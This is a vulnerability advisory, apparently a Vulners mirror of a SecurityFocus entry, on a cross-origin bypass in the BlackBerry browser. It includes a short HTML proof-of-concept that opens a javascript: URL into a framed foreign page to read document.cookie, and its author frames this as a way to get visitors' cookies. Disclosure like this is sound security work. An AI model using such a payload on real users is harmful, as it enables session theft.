source: https://www.securityfocus.com/bid/43685/info
Research In Motion BlackBerry Device Software is prone to a cross-domain information-disclosure vulnerability because the application's web browser fails to properly enforce the same-origin policy.
An attacker can exploit this issue to access local files or content from a browser window in another domain or security zone. This may allow the attacker to obtain sensitive information or may aid in further attacks.
# [+] BlackBerry Browser Cross Origin Bypass
#
# [+] Author : 599eme Man
# [+] Contact : [email protected]
#
#[------------------------------------------------------------------------------------]
#
# [+] How use ?
#
# The Cross Origin Bypass is a way to bypass the domain's restrictions, you can execute javascript throught your domain on other domain, so you can get visitor's cookie throught your website.
#
# [+] PoC :
#
# Create a file.htm, save it with this code below and upload it on your server.
#
# <!--
# BlackBerry Cross Origin Bypass<br>
# Found by 599eme Man<br>
# [email protected]<br>
# Test On google<br>
# -->
# <a href="javascript:window.open('javascript:alert(document.cookie)','blackb');">Test me</a><br>
# <iframe name="blackb" src="http://www.example.com"> </iframe>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation